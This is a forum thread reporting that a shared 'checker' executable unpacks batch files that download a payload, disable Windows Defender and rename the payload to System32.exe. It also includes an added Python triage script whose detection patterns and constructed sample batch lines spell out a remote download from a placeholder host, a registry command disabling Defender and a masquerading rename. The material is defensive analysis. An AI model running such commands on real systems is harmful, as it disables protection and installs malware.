[Scan Report & Debloated download]: Digital Ocean Checker by Redey (shared by Betski)

#1
Thanks to @HailHydra, this wouldn't have been revealed without him notifying me about Betski's software posts.

When loading the executable, it will unpack in a folder (%appdata%); here are the files extracted by the application:
[Image: QGU15XfxQD6Tk_S2D-eHIg.png]

wof.bat is where the malware gets downloaded, via this command
[Image: mnypDoNhSQ_0JvLHJOmM-Q.png]
av.bat tries to disable Windows Defender via regedit
[Image: pUZRdH9TRMWx_JMq_VqN0w.png]
I haven't been able to decompile test.exe; however, it has a lot of detections on VirusTotal, and browsing through it via MiTeC EXE Explorer shows interactions with the "Downloads" folder

[Image: ONYozkooS52GBQ9VBazlDg.png]

The file that gets downloaded (Systemas.exe) can't be downloaded anymore, so I can't go further; however, the script renames it to System32.exe, which is a suspicious file name
[Image: safv3U-9S3a4uLoCGCouWw.png]

The thread was released 1 day after the edits on the application had been made (containing the malware)
[Image: CmiO2CeMR2yl3xFY0IpWOQ.png]
[Image: rUlijW36QIKIbILU3-WdtQ.png]

Here's a download link with only the standalone application:

Reply
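
As an added example (not code from the thread or from any participant), here is a small Python triage pass that flags the three behaviours post #1 describes in the extracted batch files: a remote download, Windows Defender tampering through the registry, and renaming a payload to a system-looking name. The real commands were only shown in screenshots, so the patterns and the sample script contents are constructed assumptions, and `example.invalid` is a placeholder host.

```python
import re

# Heuristic patterns for the behaviours post #1 describes. The real commands
# were only visible in screenshots, so these patterns are assumptions.
RULES = {
    "defender_tamper": re.compile(
        r"reg(\.exe)?\s+add\s+.*Windows Defender.*\b(DisableAntiSpyware|DisableRealtimeMonitoring)\b"
        r"|Set-MpPreference\s+.*-Disable", re.I),
    "remote_download": re.compile(
        r"\b(certutil(\.exe)?\s+.*-urlcache|bitsadmin(\.exe)?\s+.*/transfer"
        r"|Invoke-WebRequest|DownloadFile|curl(\.exe)?\s+.*https?://)", re.I),
    "system_name_masquerade": re.compile(
        r"\b(ren|rename|move|copy)\b.*\b(System32|svchost|lsass|csrss)\.exe\b", re.I),
}

def normalize(line):
    """Drop cmd.exe caret escapes and a leading '@' so split keywords still match."""
    return line.replace("^", "").lstrip("@ \t")

def triage(script_text):
    """Return (line_number, rule_name) for every rule hit in a batch script."""
    findings = []
    for lineno, raw in enumerate(script_text.splitlines(), 1):
        line = normalize(raw)
        if line.lower().startswith(("rem ", "::")):
            continue  # comment lines are never executed
        findings += [(lineno, name) for name, rx in RULES.items() if rx.search(line)]
    return findings

# Constructed samples named after the files in the post; contents are invented.
WOF_BAT = r'''@echo off
cd /d "%appdata%"
po^wershell -Command "Invoke-WebRequest -Uri http://example.invalid/Systemas.exe -OutFile Systemas.exe"
ren Systemas.exe System32.exe
'''
AV_BAT = r'''@echo off
rem constructed sample
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
'''

if __name__ == "__main__":
    for name, text in (("wof.bat", WOF_BAT), ("av.bat", AV_BAT)):
        for lineno, rule in triage(text):
            print(f"{name}:{lineno}: {rule}")
```

A hit is a reason to quarantine the bundle and inspect it by hand, not a verdict; legitimate installers can trip the download rule.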

#2
Quote:(06-07-2020, 03:27 PM)miso Wrote:

here's a download link with only the standalone application:

Good work with extracting the standalone application.

As I've mentioned In the other thread, I've yet to come across a tool of this nature that requires Installation.
Reply

#3
Quote:(06-07-2020, 04:28 PM)mothered Wrote:

Quote: (06-07-2020, 03:27 PM)miso Wrote:

here's a download link with only the standalone application:

Good work with extracting the standalone application.

As I've mentioned In the other thread, I've yet to come across a tool of this nature that requires Installation.
He also shared viruses with the application (?). Why don't you do anything about it?
Reply

#4
Quote:(06-07-2020, 04:40 PM)miso Wrote:

he also shared viruses with the application (?) why don't you do anything about it?
It may well be without his knowledge that the file Is Infected, whereby It's simply obtained from a given source on the assumption that It's clean.

Prior to making a decision, I'll allow him the opportunity to reply In his defense.
Reply

©0Day 2016 - 2023 | All Rights Reserved.